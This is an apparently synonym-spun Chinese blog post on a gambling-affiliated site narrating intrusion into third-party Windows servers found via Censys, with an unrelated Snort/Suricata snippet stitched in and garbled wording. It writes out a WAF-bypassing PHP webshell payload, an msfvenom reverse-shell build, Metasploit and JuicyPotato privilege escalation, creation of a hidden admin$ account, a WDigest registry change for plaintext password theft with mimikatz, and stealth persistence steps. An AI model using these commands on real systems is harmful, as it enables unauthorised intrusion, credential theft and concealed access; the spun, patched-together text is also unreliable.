记一次Windows渗入提权进程 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

记一次Windows渗入提权进程

申博_安全防护 申博 152次浏览 未收录 0个评论

记一次Windows渗入提权历程

故事要从一次屁眼生意业务讲起,久经沙场的近邻老王。。。咳咳不好意思念错稿了

近来上手代码审计菜得疑心人生,因而想回到闲适区应用已知破绽做下渗入找回自信= =

物色目的

许多站点出于平安斟酌,都会在robots.txt文件中屏蔽掉搜索引擎对敏感途径页面的爬取。robots文件里的敏感途径在针对一个目的渗入时能够协助我们识别出主要页面,但它的存在不利于自动化东西的批量收集,所以Censys、Shodan、Zoomeye的香味就显得愈发浓重

记一次Windows渗入提权进程

首先在Censys中应用敏感路经找到了一堆服务器,挑了几个看起来顺眼的应用某代码实行破绽写入WebShell

记一次Windows渗入提权进程

前几个站基础没碰到啥障碍,碰到的宝塔WAF用file_put_con%00tents这类就能够绕过,有平安狗的也都是很久没更新过的免费版,随意找了个库存里的就过了:

file_put_contents(%27test.php%27,%27%3C?php%20function%20a(){%20return%20%22assert%22;%20}%20$a=a();%20$aa%20=%20array($_POST[%221%22]);%20call_user_func_array($a,$a=$aa);%20?%3E%27);

蚁剑连上WebShell后Open Terminal Here,whoami看了下基础都是nt authority\system权限,netstat -naonet view /domain也没看出有内网环境,因而交SRC敷衍了事

异端涌现

然后本文的主角就上台了,实行whoami发明是iis apppool\xxx,只能读到WebShell地点子目录下的文件,别的盘符及Web根目录均无权接见,phpinfo中open_basedirno value,所以题目出在账户权限上

记一次Windows渗入提权进程

上传一个去后门网红大马,二话不说就预备MySQL提权,然后回响反映过来如今基础读不到数据库的设置文件,完整不知道库名和帐号暗码,而且net user看到有一个零丁的mysql账户,预计多数也是低权限= =

记一次Windows渗入提权进程

接着最先觊觎反弹提权。。。nc能连上然则没回显,php的whoami回显返来并没有卵用。。。

nc -vv -l 12388
Listening on [0.0.0.0] (family 0, port 12388)
Connection from 103.xxx.xx.xxx 55436 received!

*********************************************
 is ok
*********************************************

[Shell]> whoami
Shellresult:


[Shell]> ^C
root@:~#  nc -vv -l 12388
Listening on [0.0.0.0] (family 0, port 12388)
Connection from 103.xxx.xx.xxx 56873 received!


nc -vv -l 12388
Listening on [0.0.0.0] (family 0, port 12388)
Connection from 103.xxx.xx.xxx 56873 received!
----------------------PHP反弹衔接----------------------
whoami
iis apppool\admin11.faicai1.com
^C

撒泡尿岑寂了一下,继承尝试应用操作体系缺失补丁提权,systeminfo猎取补丁信息并存入当地的sysinfo.txt

记一次Windows渗入提权进程

运转windows-exploit-suggester.py疾速猎取缺失补丁及对应破绽状况

记一次Windows渗入提权进程

先尝试了MSF中有exploit的几个洞

# 天生并上传反弹shell
msfvenom -p windows/shell/reverse_tcp lhost=IP lport=12388 -a x86 --platform win -f exe -o a.exe

# 监听目的端口
msf5 > use exploit/multi/handler 
set lhost IP
set lport 12388
run

# WebShell中运转a.exe,捕捉会话后输入
background
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
run

等了它一分钟如有其事地实行完后告诉我失利了= =,别的几个exploit一样都是失利

[*] Exploit completed, but no session was created.

继承尝试了K8tools的iislpe也未胜利

穷途末路想起了适才涌现过的MS16-075: Security Update for Windows SMB Server (3164038),随着链接走

开源ids ,snort and Suricata 简介,端口扫描检测逻辑

snort 和 Suricata https://www.aldeid.com/wiki/Suricata-vs-snort 知乎发现 raul17 的译文 https://zhuanlan.zhihu.com/p/34329072 rules下载 https://rules.emergingthreats.net/OPEN_download_instructions.html snort https://www.s

https://github.com/foxglovesec/RottenPotato

瞟了几眼没看懂道理,照作者提醒继承找到新的替代品

https://github.com/breenmachine/RottenPotatoNG

然则前不久刚重装过体系,手边并没有VS的编译环境,在项目中也没找到适宜的编译好的exe,此时天已最先亮了。。。狗命要紧先睡觉

睡完起来后究竟想起了juicy-potato,根据 三好学生 大神的文章最先尝试

whoami /priv

谢绝接见。
特权信息
----------------------
特权名                        形貌                 状况  
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替代一个历程级令牌   已禁用
SeIncreaseQuotaPrivilege      为历程调解内存配额   已禁用
SeAuditPrivilege              天生平安考核         已禁用
SeChangeNotifyPrivilege       绕过遍历搜检         已启用
SeImpersonatePrivilege        身份验证后模仿客户端 已启用
SeCreateGlobalPrivilege       建立全局对象         已启用
SeIncreaseWorkingSetPrivilege 增添历程事情集       已禁用


JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

看起来像是胜利了的模样,但蚁剑里whoami后依然是iis,尝试用msf的shell实行也杯水车薪

山穷水尽

俗语说世上无难事只需肯摒弃 攀缘,究竟在土司找到了大佬改写过的WebShell版烂土豆,上传到服务器后实行:

JuicyPotato.exe -p whoami
�ܾ����ʡ�
JuicyPotato modified by skyer v0.1 
[+] Testing {4991d34b-80a1-4291-83b6-3328366b9097} 23573
......
[+] Auth result 0
[+] CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}; Privilege:NT AUTHORITY\SYSTEM
[+] Launching server JuicyPotato.exe -s 4700
[+] SeImpersonate enabled!
[+] CommandThread launched!
[+] CreateProcessWithTokenW OK
[+] Waiting command server...
[*] Trying connect server 127.0.0.1:4700...
[+] Command server connected!
=================================
nt authority\system
=================================

提权胜利,但蚁剑的WebShell里彷佛只能传一个参数?再次抱起被遗弃的msf孤儿shell

# 将password替代为满足强度请求的暗码,不然须要改组战略封闭暗码强度搜检
execute -f JuicyPotato.exe -p net user admin$ password
execute -f JuicyPotato.exe -p net localgroup administrators admin$ /add

为防止风吹草动先netstat -nao看了下,被悛改的远程桌面端口处于未衔接状况,管理员应当用饭睡觉打豆豆去了,抓紧时间连上去看看

proxychains rdesktop -f 103.xxx.xx.xxx:1xxxx

redesk全屏可通过CTRL+ALT+ENTER退出

记一次Windows渗入提权进程

接见被丑拒,右键属性->平安->编辑->增加新用户

记一次Windows渗入提权进程

上传mimikatz抓管理员明文暗码失利,Windows Server 2008 R2及更高版本的体系,默许设置下没法在凭证中保留明文信息,须要改注册表守候用户再次登录

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

在组战略中布置一个纪录登录IP的bat

@echo off
date /t >>C:\WINDOWS\loginlog.log
time /t >>C:\WINDOWS\loginlog.log
netstat -an | find ":3389" | find "ESTABLISHED" >> C:\WINDOWS\loginlog.log

接着根据隐蔽账户中所述要领,尽量下降被发明的概率

此时对该目的机械的渗入也靠近尾声,以后继承试着挖挖外连的一台mysql机械、抓到管理员暗码后登录百度云看看能有更多收成没有

总结

实在不论是在之前的渗入照样此次的提权过程当中,许多时刻陷入困境时就想着摒弃算了,但大多数状况下不服输地再对峙研讨一会究竟能找到突破口,破绽挖一挖老是有的。文章末了首尾呼应一下,干了本身熬的鸡汤和夜,洗洗睡一觉继承进修代码审计ORZ


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明记一次Windows渗入提权进程
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址